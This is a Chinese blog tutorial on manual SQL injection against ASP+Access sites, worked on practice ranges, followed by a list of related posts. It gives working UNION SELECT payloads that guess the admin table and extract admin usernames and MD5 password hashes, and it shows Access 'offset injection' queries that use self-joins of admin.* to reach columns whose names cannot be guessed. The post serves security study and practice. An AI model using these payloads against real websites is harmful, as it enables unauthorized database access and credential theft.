SQL注入—Access注入,Access偏移注入

已于 2022-02-12 21:43:51 修改
阅读量837 收藏 1
点赞数
分类专栏: 网络安全 渗透测试 SQL注入 文章标签: sql 数据库 web安全 网络安全 渗透测试
于 2022-02-12 21:37:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/song123sh/article/details/122902510
版权
渗透测试 同时被 3 个专栏收录
55 篇文章 14 订阅
订阅专栏
网络安全
46 篇文章 25 订阅
订阅专栏
SQL注入
22 篇文章 1 订阅
订阅专栏

Access注入,Access偏移注入

Access数据库组成

表名
	列名
		数据

某access+asp注入靶场

image-20220211161614318

iis+asp+access

asp一般搭配access
PHP一般搭配mysql
aspx一般搭配msSQL

注入的条件是能够传参、与数据库互动,数据交互

get,post,cookie都可以注入

注入流程

1.1、进入一个可以传参的页面

http://127.0.0.1/asp/Production/PRODUCT_DETAIL.asp?id=1513

1.2、判断注入点

'或者and 1=1,and 1=2

1.3、判断字段

127.0.0.1/asp/Production/PRODUCT_DETAIL.asp?id=1513 order by 22

127.0.0.1/asp/Production/PRODUCT_DETAIL.asp?id=1513 order by 23

22返回正常,23报错说明字段数为22

image-20220211183835857

这里查的表实际上就是product表,查到22列

image-20220211165847892

1.4、判断表名

and exits (select * from admin),若存在表名为admin则回显正常,若不存在,回显错误

1.5、联合查询

union select

image-20220211211853892

由于是access数据库,只有表名、列名、内容,需要指定一个表

?id=1513 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin

一般admin就是存放管理员信息的表,access表名全靠猜

image-20220211184043411

试出来3和15,也就是说我们可以在3和15两个地方查数据,也就是查指定列数据

image-20220211171210185

http://117.24.12.33:10000/Production/PRODUCT_DETAIL.asp?id=1513 UNION SELECT 1,2,admin,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22 from admin

image-20220211184125945

此密码经过md5加密

猜解列名小技巧

查看后台(登录页)源代码

image-20220211171749341

image-20220211212045704

此靶场做过修改

Access偏移注入(知道表名,列名猜解不到时)

爆出显示位后,判断表内存在的字段个数

127.0.0.1/asp/index.asp?id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,* from admin 错误
127.0.0.1/asp/index.asp?id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,* from admin 错误
127.0.0.1/asp/index.asp?id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,* from admin 错误

以此类推,直到。。。

127.0.0.1/asp/index.asp?id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,* from admin 正确

说明了admin表下有6个字段;

*代表 admin 表的字段数,计算*代替字符的位数。

Access偏移注入原理,基本公式为:

order by 出的字段数减去*号的字段数,然而再用order by的字段数减去2倍刚才得出来的答案;

* = 6个字符
2 × * = 12个字符
22 - 12 = 10个字符

爆列名数据
一级偏移:
union select 1,2,3,4,5,6,7,8,9,10,* from (admin as a inner join admin as b on a.id = b.id)
如果你发现,上面查看了网页源码也爆不出数据,请用以下方法:
二级偏移语句:
union select 1,2,3,4,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id = b.id)inner join admin as c on a.id=c.id)
注意:这里是10个字段再减去了表里的6个字段,所以二级偏移这里是select 1,2,3,4

或者
union select 1,2,3,4,5,6,7,8,9,10,a.id,b.id,* from (admin as a inner join admin as b on a.id = b.id)

此时查看源代码会有惊喜

image-20220211212455415

image-20220211183442523

墨者靶场练习

image-20220212210640685

image-20220212210722041

image-20220212210813422

密码经过md5加密

image-20220212211038547

Shadow丶S
关注
专栏目录
access偏移-sql.rar
02-19
cracer教程培训,access数据库偏移注入网站源码,直接使用IIS搭建网站,放在wwwroot路径下即可
Access数据库注入偏移注入
seek_2022的博客
05-02 2774
文章目录一、偏移注入使用场景二、必要的SQL知识补充(一)admin.*是什么意思?(二)联合查询的字段数问题(三)access如何查询指定数据?三、靶场实战(一)判断是否存在cookie注入(二)爆破表名(三)判断当前页面显错位(四)查询admin表字段数(五)偏移注入查询flag 一、偏移注入使用场景 在SQL注入的时候会遇到一些无法查询列名的问题,比如系统自带数据库的权限不够而无法访问系统自带库。 当你猜到表名无法猜到字段名的情况下,我们可以使用偏移注入来查询那张表里面的数据。像Sqlmap之类的工
SQL注入access数据库
KHOST的博客
04-23 419
首先是sql注入产生的条件: 1.参数的传递 2.参数值可以带入到数据库 我这里是本地搭建的环境,接另外一种方法注入 手工注入值半猜解 第一步 判断是否可以注入 URL:http://localhost:58031/Production/PRODUCT_DETAIL.asp?id=1139 and 1=1 返回正常 and 1=2 返回不正常 第二步 猜解数据库表名 语句...
渗透测试---手把手教你SQL注入(7)---Access数据库注入
最新发布
weixin_52796034的博客
10-16 650
在讨论SQL注入中的Access数据库注入时,首先需要了解Access数据库的一些基本知识。Microsoft Access 是一种关系型数据库管理系统,可用于存储、管理和检索数据。虽然Access通常用于较小的数据库和单服务器环境,但它也可以用于大型企业和互联网应用。 此外,Access与其他数据库管理系统(如MySQLSQL Server等)在处理SQL注入方面有所不同。
渗透测试基础-Access数据库偏移注入
weixin_45488495的博客
04-12 464
渗透测试基础-Access数据库偏移注入偏移注入漏洞总结 只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力????! 偏移注入 偏移注入的应用场景是,当这个地方我们有了表名,但是字段名始终弄不来的使用方法。 先来了解一些数据库小知识 select * from school 代表的是查询school表里面的所有数据(如图) 但其实我们可以换其他的写法,来达到相同的查询效果 select school.* from school 所以咱们这里的
Access数据库注入之cookie注入
seek_2022的博客
05-02 1817
文章目录一、cookie注入简介(一)什么是cookie(二)为什么会存在cookie注入?二、如何修改cookie(一)通过Javascript来设置Cookie(二)通过浏览器的Application来修改(三)通过burp抓包去修改cookie(四)通过浏览器插件进行修改三、cookie注入靶场思路(一)靶场需要注意的地方(二)如何删除GET传参(三)access数据库注入的特点四、靶场实战(一)测试cookie传参(二)测试cookie注入(三)爆破表名(四)判断字段数(五)判断显错位(六)查询ad
Access偏移注入
10-02
Access偏移注入是一种针对Microsoft Access数据库的特殊SQL注入技术。这种技术利用了Access数据库在处理SQL语句时的一些特性,允许攻击者通过构造特殊的SQL查询来获取数据库中的敏感信息。偏移注入的核心思想在于...
SQL注入扩展移位溢注-漏洞银行大咖面对面19-gh0stkey
07-31
传统的SQL注入方法中,有一种被称为“偏移注入”的技术,在特定情况下(如Access数据库类型)用于获取表中的数据。然而,这种方法往往依赖于运气和个人经验,操作过程相对复杂。针对这一问题,gh0stkey提出了一个新...
Access数据库手工注入全攻略——小白必看
07-18
偏移注入则是在某些特定情况下使用的,如目标表的字段数至少是注入表的两倍,且已知目标表的一个字段,但不知道其他字段。偏移注入的原理是利用UNION查询合并不同数量的列,通过调整列数来尝试显示目标字段。例如,...
access_sql查询语句
09-28
### Access SQL 查询语句详解与分页技巧 在数据库管理领域,SQL(Structured Query Language,结构化查询语言)是操作关系型数据库的标准语言之一。它主要用于执行查询、更新数据、创建新表、删除表或访问控制等...
靶机-佛山发发鱼喊access注入
05-09
靶机-佛山发发鱼喊access注入!很多视频教程中使用的靶机!默认含参数过滤,为了方便新人测试我已经去掉了参数过滤!
渗透学习测试网站源码打包带走
05-24
渗透学习测试网站源码打包带走。asp+access注入源码;cookie注入源码;DVWA漏洞平台测试源码;ewebeditor;fck漏洞源码;fck突破“_”源码;iis6.0解析漏洞源码;phpcms2008;php包含漏洞源码;WEBSHELL箱子系统V2.0;xss漏洞测试源码;搜索注入源码;制作高级webshell后门附带工具。
墨者学院;sql手工注入access;在线靶场
xiaochenhang的博客
08-20 761
恭喜你 moke 成功登录用户管理后台,KEY: mozhee7cc35d6a83a8978b4a44f56f6d。6、枚举关键表名:正常则存在admin表;通常access数据库都有admin表;8、 枚举字段:正常则页面不报错;通常access表会存在以下三个字段;,因此看到位数以及字母组成形式的字符可以迅速判断可能是MD5编码。5、access数据库没有库名,都是表名;4、输入' 成功闭合报错,有注入漏洞;1、注册账号,启动环境;9、爆一下用户账户和密码;2、 得到端口号和地址;这里枚举失败,翻车;
[zkaq靶场]SQL注入--access数据库-偏移注入
wwxxee
05-09 424
Access注入偏移注入 适用场景: 当使用select * from admin与select admin.* from admin等价时,就可以在不知道字段名的情况下获取数据。 union select 1,2,3,admin.* ,4,5,6 from admin 通过偏移admin.*的位置来获得不同字段的数据,这时就不需要知道字段名了。 靶场 该处的sql注入access数据库-cookie注入的漏洞点。 偏移注入的漏洞点在: 由于admin表里新增了一个字段,无法通过爆破得出,所以在此处
墨者靶场 入门:SQL手工注入漏洞测试(Access数据库
qq_43233085的博客
01-10 1254
入门:SQL手工注入漏洞测试(Access数据库)题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境IIS+ASP+Access,Aspx代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。 实训目标 1.掌握SQL注入原理; 2.了解手工注入的方法; 3.了解Access的数据结构; 4.了解字符串的MD5...
Access偏移注入靶场作业
weixin_45540609的博客
04-19 375
因为ID=104和ID=105-1时页面显示内容一样,因此判断存在sql注入 不断order by 1,2,3,······,26,到27时,页面无法正常显示,则说明字段有26个 把cookie的名称设置为ID,值设置成105,把url栏里面?ID=105删除,刷新,则说明cookie优先级高于get 把cookie值设置成105 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2.
【实战渗透】对 ACCESS 偏移注入实战(针对爆不出字段名)
V1040375575的博客
09-08 499
ACCESS偏移注入记录 Access偏移注入原理,基本公式为: order by 出的字段数减去*号的字段数,然而再用order by的字段数减去2倍刚才得出来的答案; 也就是: orderby = 22 * = 6个字符 2 × * = 12个字符 22 - 12 = 10个字符 注入点: www.xxx.com/Newsview.asp?id=832 查询字段数: www.xxx.com/Newsview.asp?id=832order by 16回显正常...
适用于ACCESS和MySQL数据库偏移注入
qq_42097777的博客
04-01 458
## 注入的两个条件:1.用户可以控制传参,2.用户输入的语句被带入数据库进行查询,偏移注入同样如此 # 偏移注入还要用到"table.*" 他的意思是代表了表里的所有字段 ###运用场景是:权限不足无法获取系统表内的信息,和工具无法查出字段 先判断是否有注入点,靶场第一题,用url传参被拒绝,采用cookie进行传参 1.利用and1=1 显示正常, and 1=2 显示错误页面。证明有...
SQL注入-针对asp+access网站进行SQL注入
qq_25899635的博客
05-23 4973
asp+access网站技术介绍   ASP即Active Server Pages,是MicroSoft公司开发的服务器端脚本环境,可用来创建动态交互式网页并建立强大的web应用程序。当服务器收到对ASp文件的请求时,它会处理包含在用于构建发送给浏览器的HTML(Hyper Text Markup Language,超文本标志语言)网页文件中的服务器端脚本代码。除服务器端脚本代码外,ASP文件也...
移位溢注技术详解:告别偏移注入的人品依赖
偏移注入的基本公式是`num-d=*`,其中`num`代表查询中的一个特定数字,`d`表示查询语法中递减部分的长度,而`*`则代表表的列数。然而,这种方法往往依赖于大量的尝试和运气,过程较为繁琐。 移位溢注技术则是对偏移...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Shadow丶S

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值